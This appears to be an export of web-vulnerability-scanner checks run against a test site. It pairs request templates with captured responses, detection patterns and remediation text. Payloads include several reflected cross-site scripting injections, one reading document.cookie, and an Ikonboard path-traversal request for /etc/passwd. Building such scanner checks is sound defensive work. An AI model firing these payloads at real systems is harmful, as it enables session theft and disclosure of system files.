<p>Internal IP ranges are:<BR>10.x.x.x<BR>172.x.x.x<BR>192.168.x.x<BR><BR><BR>Note: This problem can appear multiple times on technical documentation pages. This should be determined in order to assess that the vulnerability is real.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
[^\d]10\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?[^\d] |[^\d](172\.[123]\d\.\d\d?\d?\.\d\d?\d?)[^\d] |[^\d](192\.168\.\d\d?\d?\.\d\d?\d?)[^\d]POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was --><script>alert('XSS')</script>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>--><script>alert('XSS')</script></attack>--><script>alert\('XSS'\)<\/script>GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:19 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:Ikonboard Arbitrary File Source Disclosure~FileName~ was found vulnerable.<BR>Clicking on the
Browser tab or link below will show the password file retrieved from the
system.<BR>"~FullGetURL~"<BR><A
HREF="http://www.ikondiscussion.com/ikonboard/"></A><A
HREF="http://www.ikondiscussion.com/ikonboard/"></A><BR><A
HREF="http://www.ikondiscussion.com/ikonboard/">Ikonboard</A> is a free
bulletin board system. A vulnerability in the product allows remote attackers
to read local files with the privileges of the web server.
<BR><BR><B>Vulnerable systems:</B> Ikonboard v2.1.6b and v2.1.7b .
</TABLE>An official patch is not available yet. You can
fix the script temporarily by inserting the following line under line 45 in
'help.cgi':<BR> <BR><TT> if($inhelpon =~ /\.\./) { &hackdetected; }<BR>
<BR> then at the bottom append:<BR> <BR> sub hackdetected {<BR> print
"Content-type: text/plain\n\n";<BR> print "sorry, this hole was patched
:)\n";<BR> print "you have been logged.\n";<BR> exit;<BR> }</TT>GET /cgi-bin/ikonboard/<attack>help.cgi?helpon=../../../../../etc/passwd%00</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |401GET /plink.asp?a=--><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = --><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>--><script>alert('XSS')</script></attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=>"><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>>"><script>alert('XSS')</script></attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=>"'><img%20src="javascript:alert('XSS')">&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>>"><script>alert('XSS')</script></attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3998
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>test@<script>alert(document.cookie)</script>.com</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
